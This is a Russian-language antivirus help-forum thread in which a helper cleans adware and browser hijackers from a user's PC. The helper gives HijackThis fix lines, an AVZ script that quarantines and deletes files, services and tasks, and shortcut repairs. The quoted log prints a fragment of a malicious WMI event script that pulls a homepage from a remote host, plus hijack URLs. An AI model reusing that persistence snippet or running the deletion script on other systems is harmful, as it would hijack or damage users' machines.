вирус устанавливает всяческие программы
браузеры всякие устанавливает
китайские браузеры открывает страницы с рекламой и тд
вирус устанавливает всяческие программы
браузеры всякие устанавливает
китайские браузеры открывает страницы с рекламой и тд
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Dimash7777, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis из папки Autologger и пофиксите в HijackThis (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):Выполните скрипт в AVZ:Код:R0 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxWU2bjmk_2exWZ31b5msPvzmhk_ovaNkj_ZKRvxZ2-goPDEktYL3ByI8P4ThVSaPq4oLECcXQKBoh97EjS0aYbPWpm60A3hK4EVPsCZ3QibYSAACTOSl-grvUL6pqb9V640gp7kqdpQb6AvFV3JQR17IA9taG8fkpklz R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_BxWU2bjmk_2exWZ31b5msPvzmhk_ovaNkj_ZKRvxZ2-goPDEktYL3ByI8P4ThVSaPq4oLECcXQKBoh97EjS0aYbPWpm60A3hK4EVPsCZ3QibYSAACTOSl-grvUL6pqb9V640gp7kqdpQb6AvFV3JQR17IA9taG8fkpklzu-A,&q={searchTerms} R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local F2 - REG:system.ini: HKLM\..\UserInit=wscript C:\WINDOWS\run.vbs, O2-32 - BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - C:\Users\7\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll O25 - WMI Event: ASEC - EventFilter sethomePage2 - Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb(2674 bytes)Компьютер перезагрузится.Код:begin TerminateProcessByName('C:\Windows\Temp\gE40.tmp.exe'); TerminateProcessByName('C:\Users\7\AppData\Roaming\gplyra\gplyra.exe'); TerminateProcessByName('c:\users\7\appdata\local\temp\00003763\msiql.exe'); TerminateProcessByName('c:\programdata\service.exe'); TerminateProcessByName('c:\program files (x86)\ucbrowser\application\6.0.1121.13\ucagent.exe'); TerminateProcessByName('c:\program files (x86)\ucbrowser\application\ucbrowser.exe'); TerminateProcessByName('c:\program files (x86)\ucbrowser\application\ucservice.exe'); StopService('GoogleChromeUpService'); StopService('UCBrowserSvc'); StopService('KuaiZipDrive'); StopService('ucdrv'); QuarantineFile('C:\Windows\Temp\gE40.tmp.exe', ''); QuarantineFile('C:\Users\7\AppData\Roaming\gplyra\gplyra.exe', ''); QuarantineFile('c:\users\7\appdata\local\temp\00003763\msiql.exe', ''); QuarantineFile('c:\programdata\service.exe', ''); QuarantineFile('c:\program files (x86)\ucbrowser\application\6.0.1121.13\ucagent.exe', ''); QuarantineFile('c:\program files (x86)\ucbrowser\application\ucbrowser.exe', ''); QuarantineFile('c:\program files (x86)\ucbrowser\application\ucservice.exe', ''); QuarantineFile('c:\program files\їмс№\x86\kuaizipupdatechecker.dll', ''); QuarantineFile('c:\program files (x86)\plelage\mwpcln.dll', ''); QuarantineFile('C:\WINDOWS\system32\drivers\KuaiZipDrive.sys', ''); QuarantineFile('C:\WINDOWS\System32\drivers:ucdrv-x64.sys', ''); QuarantineFile('\UUC0789.exe', ''); QuarantineFile('C:\Program Files (x86)\xxx\uc.exe', ''); QuarantineFile('C:\ProgramData\Airtostrong\Saojob.dll', ''); QuarantineFile('C:\WINDOWS\winstart.bat', ''); QuarantineFile('C:\Program Files (x86)\Soiphhehsy Client\local64spl.dll', ''); QuarantineFile('C:\Program Files (x86)\UCBrowser\Application\update_task.exe', ''); QuarantineFile('C:\ProgramData\3867l31A28c7978\3867l31A28c7978.dll', ''); QuarantineFile('C:\PROGRA~1\6A8C~1\X86\Update.exe', ''); QuarantineFile('C:\Users\7\AppData\Roaming\Adobe\Manager.exe', ''); QuarantineFile('C:\Users\7\AppData\Roaming\WindowsUpdater\Updater.exe', ''); QuarantineFile('C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe', ''); QuarantineFile('C:\ProgramData\smp2.exe', ''); QuarantineFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\Installer\chrmstp.exe', ''); DeleteFile('C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk', '32'); DeleteFile('C:\WINDOWS\Tasks\UCBrowserUpdater.job', '64'); DeleteFile('C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job', '64'); DeleteFile('C:\Windows\Temp\gE40.tmp.exe', '32'); DeleteFile('C:\Users\7\Favorites\Links\Интернет.url', '32'); DeleteFile('C:\Users\7\AppData\Roaming\gplyra\gplyra.exe', '32'); DeleteFile('c:\users\7\appdata\local\temp\00003763\msiql.exe', '32'); DeleteFile('c:\programdata\service.exe', '32'); DeleteFile('c:\program files (x86)\ucbrowser\application\6.0.1121.13\ucagent.exe', '32'); DeleteFile('c:\program files (x86)\ucbrowser\application\ucbrowser.exe', '32'); DeleteFile('c:\program files (x86)\ucbrowser\application\ucservice.exe', '32'); DeleteFile('c:\program files\їмс№\x86\kuaizipupdatechecker.dll', '32'); DeleteFile('c:\program files (x86)\plelage\mwpcln.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\chrome_elf.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\chrome_child.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\libmp3lame.DLL', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\libglesv2.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\libegl.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\chrome.dll', '32'); DeleteFile('C:\WINDOWS\system32\drivers\KuaiZipDrive.sys', '32'); DeleteFile('C:\WINDOWS\System32\drivers:ucdrv-x64.sys', '32'); DeleteFile('\UUC0789.exe', '32'); DeleteFile('C:\Program Files (x86)\xxx\uc.exe', '32'); DeleteFile('C:\ProgramData\Airtostrong\Saojob.dll', '32'); DeleteFile('C:\WINDOWS\winstart.bat', '32'); DeleteFile('C:\Program Files (x86)\Soiphhehsy Client\local64spl.dll', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\update_task.exe', '32'); DeleteFile('C:\ProgramData\3867l31A28c7978\3867l31A28c7978.dll', '32'); DeleteFile('C:\PROGRA~1\6A8C~1\X86\Update.exe', '32'); DeleteFile('C:\Users\7\AppData\Roaming\Adobe\Manager.exe', '32'); DeleteFile('C:\Users\7\AppData\Roaming\WindowsUpdater\Updater.exe', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe', '32'); DeleteFile('C:\ProgramData\smp2.exe', '32'); DeleteFile('C:\Program Files (x86)\UCBrowser\Application\6.0.1121.13\Installer\chrmstp.exe', '32'); DeleteService('GoogleChromeUpService'); DeleteService('UCBrowserSvc'); DeleteService('KuaiZipDrive'); DeleteService('ucdrv'); DeleteFileMask('c:\users\7\appdata\roaming\gplyra', '*', true); DeleteFileMask('c:\program files (x86)\ucbrowser', '*', true); DeleteFileMask('c:\program files\їмс№', '*', true); DeleteFileMask('c:\program files (x86)\plelage', '*', true); DeleteFileMask('c:\program files (x86)\xxx', '*', true); DeleteFileMask('c:\programdata\airtostrong', '*', true); DeleteFileMask('c:\program files (x86)\soiphhehsy client', '*', true); DeleteFileMask('c:\programdata\3867l31a28c7978', '*', true); DeleteFileMask('c:\progra~1\6a8c~1', '*', true); DeleteFileMask('c:\users\7\appdata\roaming\windowsupdater', '*', true); DeleteDirectory('c:\users\7\appdata\roaming\gplyra'); DeleteDirectory('c:\program files (x86)\ucbrowser'); DeleteDirectory('c:\program files\їмс№'); DeleteDirectory('c:\program files (x86)\plelage'); DeleteDirectory('c:\program files (x86)\xxx'); DeleteDirectory('c:\programdata\airtostrong'); DeleteDirectory('c:\program files (x86)\soiphhehsy client'); DeleteDirectory('c:\programdata\3867l31a28c7978'); DeleteDirectory('c:\progra~1\6a8c~1'); DeleteDirectory('c:\users\7\appdata\roaming\windowsupdater'); ExecuteFile('schtasks.exe', '/delete /TN "3867l31A28c7978" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "KuaiZip_Update" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\Manager" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\WindowsUpdater" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "SecureUpdater" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "SMW_P" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "UCBrowserUpdater" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "UCBrowserUpdaterCore" /F', 0, 15000, true); DelCLSID('{65122CB0-EA0F-47DF-A953-017170ED12F9}'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'svchost0'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'msiql'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'apphide'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters', 'ServiceDll'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Liviwardjetit\Parameters', 'ServiceDll'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'gplyra'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".Отчёт о работе прикрепите.Код:>>> "C:\Users\7\Desktop\Google Chrome.lnk" -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" =>> --load-extension="C:\Users\7\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"] >>> "C:\Users\Public\Desktop\Google Chrome.lnk" -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" =>> --load-extension="C:\Users\7\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"] >>> "C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk" -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" =>> --load-extension="C:\Users\7\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk" -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" =>> --load-extension="C:\Users\7\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"] >>> [HTTP] "C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> url,FileProtocolHandler "hxxp://vvv.mail.ru/cnt/20775012?gp=811020"] >>> [HTTP] "C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk" -> ["C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" =>> hxxp://vvv%2dsearching.com/?prd=set_epf&s=h2dztrmbl10bu,8c7f03dd-1a3f-4e77-89a3-907dc6fea706,] >>> [modified] "C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk" -> ["C:\Program Files (x86)\Internet Explorer\iexplore.exe"] >>> [modified] "C:\Users\7\Desktop\разное\Mozilla Firefox.lnk" -> ["C:\Program Files (x86)\Mozilla Firefox\firefox.exe" =>> hxxp://vvv-searching.com/?prd=set_epc&s=H2Dztrmbl10BU,8c7f03dd-1a3f-4e77-89a3-907dc6fea706,] - [HTTP][MASK][h][s] "C:\Users\7\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk" -> ["C:\Windows\explorer.exe" =>> "hxxp://opatolo.ru/?utm_source=startlink03&utm_term=776C298C77187EA15A229C16B44F09AA&utm_d=20160208"] - [HTTP] "C:\Users\7\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk" -> ["C:\Windows\System32\rundll32.exe" =>> url,FileProtocolHandler "hxxp://vvv.mail.ru/cnt/20775012?gp=811020"] >>> [MASK] "C:\Users\7\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.ico" (32038 байт) (MD5: F45E88EB759D99DBFC282F419BF67C97)
Сделайте новый лог такой версией Autologger.
WBR,
Vadim
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 5
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) Dimash7777, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
